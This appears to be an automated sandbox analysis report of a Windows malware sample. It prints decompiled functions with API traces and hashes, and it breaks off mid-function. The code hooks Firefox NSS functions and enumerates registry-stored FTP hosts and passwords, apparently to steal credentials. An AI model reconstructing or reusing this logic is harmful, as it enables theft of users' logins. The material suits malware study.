    							_t12 =  *_t20 & 0x0000ffff;
    							if(_t12 != 0x5c && _t12 != 0x2f) {
    								break;
    							}
    							_t20 =  &(_t20[1]);
    						}
    						if(PathCombineW(_t23, _t26 + 0x218, _t20) == 0) {
    							L11:
    							_t25 = _t25 + 1;
    							if(_t25 < 0x64) {
    								continue;
    							} else {
    								goto L12;
    							}
    						} else {
    							_t14 = CreateFileW(_t23, 0x40000000, 1, 0, 2, 0x80, 0);
    							if(_t14 != 0xffffffff) {
    								CloseHandle(_t14);
    								return 1;
    							} else {
    								goto L11;
    							}
    						}
    						goto L14;
    					}
    					goto L12;
    				}
    				L14:
    			}















    APIs
    • GetTempPathW.KERNEL32(000000F6,?,?,?,00000000), ref: 004181E6
    • GetTickCount.KERNEL32 ref: 00418200
    • PathCombineW.SHLWAPI(?,?,?,?,?,?,00000000), ref: 00418264
    • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000,?,?,?,00000000), ref: 00418281
    • CloseHandle.KERNEL32(00000000,?,?,?,00000000), ref: 004182A1
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: Path$CloseCombineCountCreateFileHandleTempTick
    • String ID: %s%08x.%s$tmp
    • API String ID: 4078759487-234517578
    • Opcode ID: b9979ec4bb5e81f5d117cb211a9ae66096ab21a0a85d4f71bfa598fcfc0145e4
    • Instruction ID: 7a861d23faf8b3bcd23b63f5ccf9a0c5b85c7030d134e78214f4e93367ce35f7
    • Opcode Fuzzy Hash: b9979ec4bb5e81f5d117cb211a9ae66096ab21a0a85d4f71bfa598fcfc0145e4
    • Instruction Fuzzy Hash: 5B117B716806046BE6306760BC86FFB3358E751714F200A7FF721E51E0DA7D98C5922D
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 72%
    			E00413580() {
    				char _v1024;
    				char _v1028;
    				char _v1036;
    				intOrPtr _v1040;
    				_Unknown_base(*)()* _t16;
    				intOrPtr _t19;
    				void* _t20;
    				void* _t23;
    				struct HINSTANCE__* _t29;
    				void* _t30;
    				void* _t31;
    				void* _t33;
    
    				_t33 =  &_v1028;
    				_t30 = 0;
    				_t29 = LoadLibraryA("urlmon.dll");
    				if(_t29 == 0) {
    					L13:
    					return _t30;
    				} else {
    					_t16 = GetProcAddress(_t29, "ObtainUserAgentString");
    					if(_t16 == 0) {
    						L12:
    						FreeLibrary(_t29);
    						goto L13;
    					} else {
    						_push( &_v1028);
    						_push( &_v1024);
    						_push(0);
    						_v1028 = 0x3ff;
    						_v1024 = 0;
    						if( *_t16() != 0) {
    							goto L12;
    						} else {
    							_t19 = _v1040;
    							if(_t19 > 0x3ff) {
    								_t19 = 0x3ff;
    								_v1040 = 0x3ff;
    							}
    							 *((char*)(_t33 + _t19 + 0xc)) = 0;
    							_t31 = 0;
    							if(_v1036 != 0) {
    								do {
    									_t31 = _t31 + 1;
    								} while ( *((char*)(_t33 + _t31 + 0xc)) != 0);
    							}
    							_t12 = _t31 + 1; // 0x2
    							_t20 = _t12;
    							if(_t20 != 0) {
    								_t23 = HeapAlloc( *0x42e6d4, 8, _t20 + 4);
    								if(_t23 != 0) {
    									_t23 = E00410820(_t23,  &_v1036, _t31);
    								}
    								_t30 = _t23;
    								goto L12;
    							} else {
    								FreeLibrary(_t29);
    								return _t20;
    							}
    						}
    					}
    				}
    			}
















    APIs
    • LoadLibraryA.KERNEL32(urlmon.dll,?,?), ref: 0041358F
    • GetProcAddress.KERNEL32(00000000,ObtainUserAgentString), ref: 004135A5
    • FreeLibrary.KERNEL32(00000000), ref: 00413605
    • HeapAlloc.KERNEL32(?,00000008,-00000003), ref: 00413622
    • FreeLibrary.KERNEL32(00000000), ref: 0041363B
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: Library$Free$AddressAllocHeapLoadProc
    • String ID: ObtainUserAgentString$urlmon.dll
    • API String ID: 3978381411-2685262326
    • Opcode ID: 09a3acade8f6e9e06a4deae2a18632431d8e15a699d56f0f6077f93f958dadd1
    • Instruction ID: b645aff6767fdd94bfb2318ef4c2c2f56b2faf65e18607f4c825cce178e19c3b
    • Opcode Fuzzy Hash: 09a3acade8f6e9e06a4deae2a18632431d8e15a699d56f0f6077f93f958dadd1
    • Instruction Fuzzy Hash: 95110271A043416BE321DF69D848BABBADC9FD0B05F04843EF945E2251E738CA468799
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • socket.WS2_32(?,00000002,00000000), ref: 0041546B
    • WSAIoctl.WS2_32(00000000,48000016,00000000,00000000,?,00000000,?,00000000,00000000), ref: 00415498
    • WSAGetLastError.WS2_32(?,?,00000000,00004E23), ref: 0041549F
    • HeapAlloc.KERNEL32(?,00000008,?,?,?,00000000,00004E23), ref: 004154C0
    • WSAIoctl.WS2_32(00000000,48000016,00000000,00000000,00000000,?,?,00000000,00000000), ref: 004154E5
    • closesocket.WS2_32(00000000), ref: 004154F5
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: Ioctl$AllocErrorHeapLastclosesocketsocket
    • String ID: p0u
    • API String ID: 1822668714-1742372003
    • Opcode ID: 812dc81ce5a78006a11da1ee681b641013d6790edc7987994e320644fec62e19
    • Instruction ID: cbaaac5ffdf5255b5dc68bbcd8357e0299889c8a9f5e31d2fd7cb7e42d9fa441
    • Opcode Fuzzy Hash: 812dc81ce5a78006a11da1ee681b641013d6790edc7987994e320644fec62e19
    • Instruction Fuzzy Hash: BC1106316002207FE230966D9C89FEB2A5CEBC5B70F000615F915E62D1DA34EC80C2A9
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00407930(struct HINSTANCE__* __eax, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
    				_Unknown_base(*)()* _t9;
    				_Unknown_base(*)()* _t10;
    				_Unknown_base(*)()* _t11;
    				struct HINSTANCE__* _t13;
    				struct HINSTANCE__* _t15;
    				struct HINSTANCE__* _t16;
    
    				_t16 = __eax;
    				 *0x42d3e0 = 0;
    				 *0x42d3e4 = 0;
    				InitializeCriticalSection(0x42d3c4);
    				 *0x42d3dc = _a4;
    				 *0x42d3bc = _t16;
    				 *0x42d3b8 = _a8;
    				 *0x42d3e8 = _a12;
    				 *0x42d3b4 = _a16;
    				_t9 = GetProcAddress(_t16, "PR_GetNameForIdentity");
    				_t13 =  *0x42d3bc; // 0x0
    				 *0x42d3b0 = _t9;
    				_t10 = GetProcAddress(_t13, "PR_SetError");
    				_t15 =  *0x42d3bc; // 0x0
    				 *0x42d3c0 = _t10;
    				_t11 = GetProcAddress(_t15, "PR_GetError");
    				 *0x42d3ac = _t11;
    				return _t11;
    			}










    APIs
    • InitializeCriticalSection.KERNEL32(0042D3C4,00000000,0041E902,00000000,00000000,00000000,00000000,0042D348), ref: 00407944
    • GetProcAddress.KERNEL32(00000000,PR_GetNameForIdentity), ref: 00407982
    • GetProcAddress.KERNEL32(00000000,PR_SetError), ref: 00407995
    • GetProcAddress.KERNEL32(00000000,PR_GetError), ref: 004079A8
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: AddressProc$CriticalInitializeSection
    • String ID: PR_GetError$PR_GetNameForIdentity$PR_SetError
    • API String ID: 2804437462-2578621715
    • Opcode ID: 7e1823dcd238c7ed10041aef1269a97375049c7b311e96669b3d6e82c84c42f8
    • Instruction ID: 0181c4a8ca72cfcf612dcfbf25d3113f9939aedb166866ab6e4c0ceaaaa8f364
    • Opcode Fuzzy Hash: 7e1823dcd238c7ed10041aef1269a97375049c7b311e96669b3d6e82c84c42f8
    • Instruction Fuzzy Hash: 350192B5F143509FC720DF69EC44A467BE4AB88750794893FA804D32A4D7749402CF4E
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 92%
    			E00422050() {
    				void* __ebx;
    				void* __esi;
    				void* _t57;
    				long _t79;
    				intOrPtr _t84;
    				void* _t90;
    				void* _t93;
    				void* _t96;
    				void* _t126;
    				int _t127;
    				void* _t128;
    				void* _t130;
    				int _t137;
    				void* _t139;
    				void* _t142;
    				void* _t143;
    
    				E00410870(_t143 + 0x24, _t143 + 0x24, 0, 8);
    				_t57 = HeapAlloc( *0x42e6d4, 8, 0xc20);
    				_t93 = _t57;
    				 *(_t143 + 0x18) = _t93;
    				if(_t93 != 0) {
    					 *((intOrPtr*)(_t143 + 0x2c)) = 0x80000001;
    					 *((intOrPtr*)(_t143 + 0x30)) = 0x80000002;
    					_t6 = _t93 + 0x3fc; // 0x3fc
    					_t142 = _t6;
    					E00424100(0x8a, _t143 + 0xb0);
    					E00424100(0x8b, _t143 + 0x34);
    					E00424100(0x8c, _t143 + 0x70);
    					E00424100(0x8d, _t143 + 0x5c);
    					E00424100(0x8e, _t143 + 0x48);
    					_t127 = 0;
    					 *(_t143 + 0x24) = 0;
    					do {
    						if(RegOpenKeyExW( *(_t143 + 0x2c + _t127 * 4), _t143 + 0xbc, 0, 8, _t143 + 0x10) == 0) {
    							_t137 = 0;
    							 *((intOrPtr*)(_t143 + 0x34)) = 0x104;
    							if(RegEnumKeyExW( *(_t143 + 0x10), 0, _t143 + 0x11c, _t143 + 0x24, 0, 0, 0, 0) == 0) {
    								do {
    									 *((intOrPtr*)(_t143 + 0x34)) = _t137 + 1;
    									_t139 = E00416420( *(_t143 + 0x1c), _t143 + 0x110, _t143 + 0x38, 0xff);
    									if(_t139 != 0xffffffff && _t139 != 0) {
    										_t122 = _t143 + 0x110;
    										_t96 = _t93 + 0x1fe;
    										_t128 = E00416420( *(_t143 + 0x10), _t143 + 0x110, _t143 + 0x60, 0xff);
    										if(_t128 != 0xffffffff && _t128 != 0) {
    											_t84 = E00416420( *(_t143 + 0x18), _t143 + 0x110, _t143 + 0x4c, 0xff);
    											 *((intOrPtr*)(_t143 + 0x14)) = _t84;
    											if(_t84 != 0xffffffff && _t84 != 0 && E00421F60(_t122, _t142, _t128 + _t139) > 0) {
    												_t130 = E00416580( *(_t143 + 0x10), _t143 + 0x10c, _t143 + 0x70);
    												if(_t130 < 1 || _t130 > 0xffff) {
    													_t130 = 0x15;
    												}
    												E00424100(0x55, _t143 + 0x88);
    												_push(_t130);
    												_push( *(_t143 + 0x18));
    												_push(_t142);
    												_push(_t96);
    												_t37 = _t142 + 0x1fe; // 0x5fa
    												_t90 = E00411D10( *(_t143 + 0x18), 0x311, _t37, _t143 + 0x88);
    												_t143 = _t143 + 0x14;
    												if(_t90 > 0) {
    													_t38 = _t142 + 0x1fe; // 0x5fa
    													if(E00410D70(_t143 + 0x20, _t38, _t90) != 0) {
    														 *((intOrPtr*)(_t143 + 0x20)) =  *((intOrPtr*)(_t143 + 0x20)) + 1;
    													}
    												}
    											}
    										}
    									}
    									_t137 =  *(_t143 + 0x28);
    									 *((intOrPtr*)(_t143 + 0x34)) = 0x104;
    									_t79 = RegEnumKeyExW( *(_t143 + 0x10), _t137, _t143 + 0x11c, _t143 + 0x24, 0, 0, 0, 0);
    									_t93 =  *(_t143 + 0x18);
    								} while (_t79 == 0);
    								_t127 =  *(_t143 + 0x24);
    							}
    							RegCloseKey( *(_t143 + 0x10));
    						}
    						_t127 = _t127 + 1;
    						 *(_t143 + 0x24) = _t127;
    					} while (_t127 < 2);
    					_t57 = HeapFree( *0x42e6d4, 0, _t93);
    				}
    				if( *((intOrPtr*)(_t143 + 0x20)) <= 0) {
    					_t57 =  *(_t143 + 0x1c);
    					if(_t57 != 0) {
    						return HeapFree( *0x42e6d4, 0, _t57);
    					}
    					goto L30;
    				} else {
    					_t126 =  *(_t143 + 0x1c);
    					if(_t126 == 0) {
    						L30:
    						return _t57;
    					} else {
    						if( *_t126 != 0) {
    							E00424100(0x8f, _t143 + 0x310);
    							E0040D880(_t126, 0xcb, _t143 + 0x310);
    						}
    						return HeapFree( *0x42e6d4, 0, _t126);
    					}
    				}
    			}




















    APIs
    • HeapAlloc.KERNEL32(?,00000008,00000C20,?,00000000,00000008,?,00000000), ref: 00422076
    • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000008,?), ref: 00422106
    • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00422135
    • RegCloseKey.ADVAPI32(?), ref: 004222A3
      • Part of subcall function 00416420: RegOpenKeyExW.ADVAPI32(80000002,00000000,00000000,00000001,00000000,?,00000000,00000000,?,004106E6,?,?,00000104,?,00000000), ref: 00416448
      • Part of subcall function 00416420: RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 00416469
      • Part of subcall function 00416420: RegCloseKey.ADVAPI32(?,?,00000000), ref: 0041647B
    • RegEnumKeyExW.ADVAPI32(?,?,?,?,00000000,00000000,00000000,00000000,?,?,000000FF), ref: 00422288
      • Part of subcall function 00416420: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000000,?,?,00000000), ref: 004164DB
      • Part of subcall function 00416420: HeapFree.KERNEL32(?,00000000,00000000,?,?,00000000), ref: 004164F5
      • Part of subcall function 00416580: RegOpenKeyExW.ADVAPI32 ref: 004165A6
      • Part of subcall function 00416580: RegQueryValueExW.ADVAPI32(00000001,00000004,00000000,80000001,00000000,?), ref: 004165CB
      • Part of subcall function 00416580: RegCloseKey.ADVAPI32(?), ref: 004165DD
    • HeapFree.KERNEL32(?,00000000,00000000), ref: 004222C6
    • HeapFree.KERNEL32(?,00000000,?), ref: 0042230F
    • HeapFree.KERNEL32(?,00000000,?), ref: 0042232D
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: Heap$Free$CloseOpen$EnumQueryValue$AllocEnvironmentExpandStrings
    • String ID:
    • API String ID: 4155870178-0
    • Opcode ID: 0e493998c060e2cd69c66f39761af7947f561dc338771a916f8c479dac1d332f
    • Instruction ID: 89d1e862645c9b6fd1dd19b5bf4ac953a6e4a55b2cd61b793e336686fc210f94
    • Opcode Fuzzy Hash: 0e493998c060e2cd69c66f39761af7947f561dc338771a916f8c479dac1d332f
    • Instruction Fuzzy Hash: C2710A31704321ABD320DB55ED45FAB77E9FBC8704F40092EBA4497290DB78E945CBAA
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 92%
    			E00422750() {
    				void* __ebx;
    				void* __esi;
    				void* _t53;
    				intOrPtr _t73;
    				intOrPtr _t77;
    				intOrPtr _t80;
    				void* _t86;
    				void* _t90;
    				void* _t122;
    				void* _t123;
    				int _t130;
    				void* _t134;
    				void* _t135;
    
    				E00410870(_t135 + 0x20, _t135 + 0x20, 0, 8);
    				_t53 = HeapAlloc( *0x42e6d4, 8, 0xc20);
    				_t134 = _t53;
    				if(_t134 == 0) {
    					L27:
    					return _t53;
    				} else {
    					_t2 = _t134 + 0x3fc; // 0x3fc
    					_t3 = _t2 + 0x1fe; // 0x5fa
    					 *((intOrPtr*)(_t135 + 0x20)) = _t2;
    					 *(_t135 + 0x24) = _t3;
    					E00424100(0x97, _t135 + 0x80);
    					E00424100(0x98, _t135 + 0x40);
    					E00424100(0x99, _t135 + 0x4c);
    					E00424100(0x9a, _t135 + 0x34);
    					E00424100(0x9b, _t135 + 0x2c);
    					if(RegOpenKeyExW(0x80000001, _t135 + 0x8c, 0, 8, _t135 + 0x10) == 0) {
    						_t130 = 0;
    						 *((intOrPtr*)(_t135 + 0x34)) = 0x104;
    						if(RegEnumKeyExW( *(_t135 + 0x10), 0, _t135 + 0xd4, _t135 + 0x24, 0, 0, 0, 0) == 0) {
    							goto L5;
    							L18:
    							_t130 =  *(_t135 + 0x28);
    							 *((intOrPtr*)(_t135 + 0x34)) = 0x104;
    							if(RegEnumKeyExW( *(_t135 + 0x10), _t130, _t135 + 0xd4, _t135 + 0x24, 0, 0, 0, 0) == 0) {
    								_t121 =  *((intOrPtr*)(_t135 + 0x20));
    								L5:
    								 *((intOrPtr*)(_t135 + 0x34)) = _t130 + 1;
    								_t73 = E00416420( *((intOrPtr*)(_t135 + 0x1c)), _t135 + 0xc8, _t135 + 0x44, 0xff);
    								 *((intOrPtr*)(_t135 + 0x14)) = _t73;
    								if(_t73 != 0xffffffff && _t73 != 0) {
    									_t26 = _t134 + 0x1fe; // 0x1fe
    									_t90 = _t26;
    									_t77 = E00416420( *(_t135 + 0x10), _t135 + 0xc8, _t135 + 0x38, 0xff);
    									 *((intOrPtr*)(_t135 + 0x14)) = _t77;
    									if(_t77 != 0xffffffff && _t77 != 0) {
    										_t80 = E00416420( *(_t135 + 0x18), _t135 + 0xc8, _t135 + 0x30, 0xff);
    										 *((intOrPtr*)(_t135 + 0x14)) = _t80;
    										if(_t80 != 0xffffffff && _t80 != 0 && E004212F0(_t121) > 0) {
    											_t123 = E00416580( *(_t135 + 0x10), _t135 + 0xc4, _t135 + 0x4c);
    											if(_t123 < 1 || _t123 > 0xffff) {
    												_t123 = 0x15;
    											}
    											E00424100(0x55, _t135 + 0x58);
    											_push(_t123);
    											_push(_t134);
    											_push( *((intOrPtr*)(_t135 + 0x20)));
    											_t133 =  *((intOrPtr*)(_t135 + 0x30));
    											_push(_t90);
    											_t86 = E00411D10( *((intOrPtr*)(_t135 + 0x20)), 0x311,  *((intOrPtr*)(_t135 + 0x30)), _t135 + 0x58);
    											_t135 = _t135 + 0x14;
    											if(_t86 > 0 && E00410D70(_t135 + 0x1c, _t133, _t86) != 0) {
    												 *((intOrPtr*)(_t135 + 0x1c)) =  *((intOrPtr*)(_t135 + 0x1c)) + 1;
    											}
    										}
    									}
    								}
    								goto L18;
    							}
    						}
    						RegCloseKey( *(_t135 + 0x10));
    					}
    					_t53 = HeapFree( *0x42e6d4, 0, _t134);
    					if( *((intOrPtr*)(_t135 + 0x1c)) <= 0) {
    						_t53 =  *(_t135 + 0x18);
    						if(_t53 != 0) {
    							return HeapFree( *0x42e6d4, 0, _t53);
    						}
    						goto L27;
    					} else {
    						_t122 =  *(_t135 + 0x18);
    						if(_t122 == 0) {
    							goto L27;
    						} else {
    							if( *_t122 != 0) {
    								E00424100(0x9c, _t135 + 0x2c8);
    								E0040D880(_t122, 0xcb, _t135 + 0x2c8);
    							}
    							return HeapFree( *0x42e6d4, 0, _t122);
    						}
    					}
    				}
    			}

















    APIs
    • HeapAlloc.KERNEL32(?,00000008,00000C20,?,00000000,00000008,?,00000000), ref: 00422776
    • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000008,?,?,00000000), ref: 004227F9
    • RegEnumKeyExW.ADVAPI32 ref: 00422828
    • RegEnumKeyExW.ADVAPI32(?,?,?,?,00000000,00000000,00000000,00000000,?,?,000000FF), ref: 0042297A
      • Part of subcall function 00416420: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000000,?,?,00000000), ref: 004164DB
      • Part of subcall function 00416420: HeapFree.KERNEL32(?,00000000,00000000,?,?,00000000), ref: 004164F5
      • Part of subcall function 00416580: RegOpenKeyExW.ADVAPI32 ref: 004165A6
      • Part of subcall function 00416580: RegQueryValueExW.ADVAPI32(00000001,00000004,00000000,80000001,00000000,?), ref: 004165CB
      • Part of subcall function 00416580: RegCloseKey.ADVAPI32(?), ref: 004165DD
    • RegCloseKey.ADVAPI32(?), ref: 0042298D
    • HeapFree.KERNEL32(?,00000000,00000000,?,00000000), ref: 004229A2
    • HeapFree.KERNEL32(?,00000000,?), ref: 004229E3
    • HeapFree.KERNEL32(?,00000000,?), ref: 00422A01
      • Part of subcall function 00416420: RegOpenKeyExW.ADVAPI32(80000002,00000000,00000000,00000001,00000000,?,00000000,00000000,?,004106E6,?,?,00000104,?,00000000), ref: 00416448
      • Part of subcall function 00416420: RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 00416469
      • Part of subcall function 00416420: RegCloseKey.ADVAPI32(?,?,00000000), ref: 0041647B
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: Heap$Free$CloseOpen$EnumQueryValue$AllocEnvironmentExpandStrings
    • String ID:
    • API String ID: 4155870178-0
    • Opcode ID: 03f6088cecbfeec5714b77d56267a313299ccbf426603edb4ee554dc898e5875
    • Instruction ID: 8dad6c24591735d3f9289526875395141519d00923ea3748f2959b51b13c3e8e
    • Opcode Fuzzy Hash: 03f6088cecbfeec5714b77d56267a313299ccbf426603edb4ee554dc898e5875
    • Instruction Fuzzy Hash: 2A71E7713043126BD320DB55ED44FAF77E8EBC4744F44492EBA4497280DBB8E949CBAA
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 94%
    			E0040CB50(char __edx) {
    				intOrPtr _v10;
    				char _v352;
    				char _v492;
    				char _v562;
    				char _v616;
    				void* _v620;
    				char _v624;
    				intOrPtr _v628;
    				void* __edi;
    				void* __esi;
    				void* _t55;
    				void* _t61;
    				void* _t70;
    				intOrPtr _t78;
    				intOrPtr* _t80;
    				intOrPtr* _t82;
    				intOrPtr _t83;
    				intOrPtr* _t87;
    				char* _t90;
    				void* _t98;
    				intOrPtr _t107;
    				intOrPtr _t111;
    				intOrPtr _t118;
    				intOrPtr _t120;
    				void** _t122;
    				char _t124;
    				char _t132;
    				WCHAR* _t134;
    				void* _t137;
    				intOrPtr* _t139;
    				void* _t146;
    
    				_t112 = __edx;
    				_t132 = __edx;
    				_t90 =  *((intOrPtr*)(__edx + 0x18));
    				_v624 = __edx;
    				if( *_t90 != 1) {
    					if(_t98 != 0) {
    						L16:
    						_t122 = _t90 + 8;
    						_t55 = E004193E0(_t122,  &_v620,  &_v616, _t90 + 0x20);
    						if(_t55 == 0 || _v616 <= 0) {
    							goto L24;
    						} else {
    							_t146 = _v620;
    							_t55 = E00419090(_t146,  *((intOrPtr*)(_v624 + 0x14)));
    							_t137 = _t55;
    							if(_t146 != 0) {
    								_t55 = HeapFree( *0x42e6d4, 0, _t146);
    							}
    							if(_t137 == 0) {
    								goto L24;
    							} else {
    								_t124 = _v624;
    								_t61 =  *(_t124 + 0x14);
    								if(_t61 != 0) {
    									HeapFree( *0x42e6d4, 0, _t61);
    								}
    								 *(_t124 + 0x14) = _t137;
    								return 0;
    							}
    						}
    					} else {
    						_t122 = _t90 + 8;
    						if(_t122 != 0) {
    							_t70 =  *_t122;
    							if(_t70 != 0xffffffff) {
    								FlushFileBuffers(_t70);
    								CloseHandle( *_t122);
    								 *_t122 = 0xffffffff;
    							}
    						}
    						E0041D1B0( &_v492);
    						 *((intOrPtr*)(_t90 + 0x18)) = _v10;
    						E00410820(_t90 + 0x20,  &_v352, 0x102);
    						_push(_t122);
    						_t55 = E00419110(_t90 + 0x122);
    						if(_t55 == 0) {
    							L24:
    							if(_t122 != 0) {
    								_t55 =  *_t122;
    								if(_t55 != 0xffffffff) {
    									FlushFileBuffers(_t55);
    									_t55 = CloseHandle( *_t122);
    									 *_t122 = 0xffffffff;
    								}
    							}
    							_push(0x80);
    							_t134 = _t90 + 0x122;
    							 *_t55 = _t55 +  *_t55;
    							SetFileAttributesW(_t134, ??);
    							DeleteFileW(_t134);
    							return 1;
    						} else {
    							goto L16;
    						}
    					}
    				} else {
    					_v628 = E00413650( *0x42edbc);
    					E0041A440(__edx,  &_v616);
    					_t139 = _t132 + 0x14;
    					if(E0040C730(_t112, _t139, 0x2e) == 0) {
    						L10:
    						return 2;
    					} else {
    						_t78 =  *((intOrPtr*)( *_t139 + 0x14));
    						_t104 = _t78 + 0x14;
    						if(_t78 + 0x14 <= _t78 || E00410740(_t104, _t139) == 0) {
    							goto L10;
    						} else {
    							_t118 =  *_t139;
    							_t80 =  *((intOrPtr*)(_t118 + 0x14));
    							 *_t80 =  *_t80 + _t80;
    							_t9 = _t80 + _t118 + 0x10; // 0x10
    							 *((intOrPtr*)(_t80 + _t118 + 8)) = 4;
    							_t82 = E00410820(_t9,  &_v624, 4);
    							_t107 =  *((intOrPtr*)(_t82 + 8)) +  *((intOrPtr*)(_t118 + 0x14)) + 0x10;
    							if(_t107 > 0xa00000) {
    								goto L10;
    							} else {
    								 *((intOrPtr*)(_t82 + 0xc)) = 4;
    								 *_t82 = 0x2715;
    								 *((intOrPtr*)(_t82 + 4)) = 0x20000;
    								 *((intOrPtr*)(_t118 + 0x14)) = _t107;
    								 *((intOrPtr*)(_t118 + 0x1c)) =  *((intOrPtr*)(_t118 + 0x1c)) + 1;
    								_t83 =  *((intOrPtr*)( *_t139 + 0x14));
    								_t108 = _t83 + 0x12;
    								if(_t83 + 0x12 <= _t83 || E00410740(_t108, _t139) == 0) {
    									goto L10;
    								} else {
    									_t120 =  *_t139;
    									 *((intOrPtr*)( *((intOrPtr*)(_t120 + 0x14)) + _t120 + 8)) = 2;
    									_t87 = E00410820( *((intOrPtr*)(_t120 + 0x14)) + _t120 + 0x10,  &_v562, 2);
    									_t111 =  *((intOrPtr*)(_t120 + 0x14)) +  *((intOrPtr*)(_t87 + 8)) + 0x10;
    									if(_t111 > 0xa00000) {
    										goto L10;
    									} else {
    										 *_t87 = 0x2716;
    										 *((intOrPtr*)(_t87 + 4)) = 0x20000;
    										 *((intOrPtr*)(_t87 + 0xc)) = 2;
    										 *((intOrPtr*)(_t120 + 0x1c)) =  *((intOrPtr*)(_t120 + 0x1c)) + 1;
    										 *((intOrPtr*)(_t120 + 0x14)) = _t111;
    										return 0;
    									}
    								}
    							}
    						}
    					}
    				}
    			}



































    APIs
    • FlushFileBuffers.KERNEL32 ref: 0040CC86
    • CloseHandle.KERNEL32 ref: 0040CC8F
    • HeapFree.KERNEL32(?,00000000,?), ref: 0040CD1C
    • HeapFree.KERNEL32(?,00000000,?), ref: 0040CD3A
      • Part of subcall function 00413650: GetTickCount.KERNEL32 ref: 004136A2
      • Part of subcall function 00413650: GetTickCount.KERNEL32 ref: 004136B4
      • Part of subcall function 00413650: HeapFree.KERNEL32(?,00000000,?,00000000), ref: 004136CF
      • Part of subcall function 0041A440: RegOpenKeyExW.ADVAPI32 ref: 0041A48E
      • Part of subcall function 0041A440: HeapFree.KERNEL32(?,00000000,?,00000000,?), ref: 0041A4FD
      • Part of subcall function 0040C730: HeapAlloc.KERNEL32(?,00000008,00000034), ref: 0040C74E
      • Part of subcall function 00410740: HeapFree.KERNEL32(?,?,?,0041895B,00000000,00000000,00000000,00000000,0040C6FF,-00002720,00020000,00000000,00000000,?,00000001), ref: 00410752
      • Part of subcall function 00410740: HeapAlloc.KERNEL32(?,00000008,?,0041895B,00000000,00000000,00000000,00000000,0040C6FF,-00002720,00020000,00000000,00000000,?,00000001), ref: 00410772
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: Heap$Free$AllocCountTick$BuffersCloseFileFlushHandleOpen
    • String ID:
    • API String ID: 1950039238-0
    • Opcode ID: b298332df30c5466a94e493a92661b936207d7855c9aad268a29dc88f597f1ed
    • Instruction ID: c1cbbf4232738d2a663a2cac64dd6acd8ad83b4d8af0c02a7df19a070af2b8a2
    • Opcode Fuzzy Hash: b298332df30c5466a94e493a92661b936207d7855c9aad268a29dc88f597f1ed
    • Instruction Fuzzy Hash: 3D610271604201CBC714DF25E8C4AABB7A5FF48314F0406AEF948AB392D735EC85CBA9
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 80%
    			E004133B0(char* __eax) {
    				char _v2;
    				intOrPtr _v4;
    				void* _v12;
    				void* _v16;
    				signed int _v20;
    				char _v29;
    				char _v30;
    				char _v31;
    				char _v32;
    				char _v36;
    				intOrPtr _v44;
    				void* _v48;
    				char _v52;
    				void* _v56;
    				void* _v60;
    				char _t51;
    				void* _t52;
    				void* _t53;
    				char _t62;
    				int _t66;
    				void* _t68;
    				intOrPtr _t70;
    				char _t72;
    				void* _t74;
